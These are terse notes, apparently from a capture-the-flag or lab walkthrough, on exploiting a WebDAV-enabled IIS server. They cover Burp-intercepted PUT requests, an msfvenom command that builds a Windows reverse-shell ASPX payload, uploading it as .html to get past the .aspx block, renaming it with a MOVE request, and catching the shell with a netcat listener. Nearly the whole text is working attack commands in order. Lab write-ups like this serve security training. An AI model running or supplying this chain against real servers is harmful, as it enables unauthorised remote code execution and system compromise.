Proxy 10.x.x.x: 80
Burp > Intercept
PUT > Send to repeater
PUT /ippsec.html HTTP/1.1
this is a test
http://10.x.x.x/ippsec.html .. works!
msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx
copy/paste the text of aspx msfvenom
paste into burp (bottom)
PUT /ippsec.html HTTP/1.1 ..html ok
PUT /ippsec.aspx HTTP/1.1 ..aspx forbidden!
OPTIONS / HTTP/1.1 ..shows list of webdav options
MOVE /ippsec.html HTTP/1.1 ..move html
Destination: /ippsec.aspx ..aspx!
http://10.x.x.x/ippsec.aspx
nc -nvlp 4444
Connected!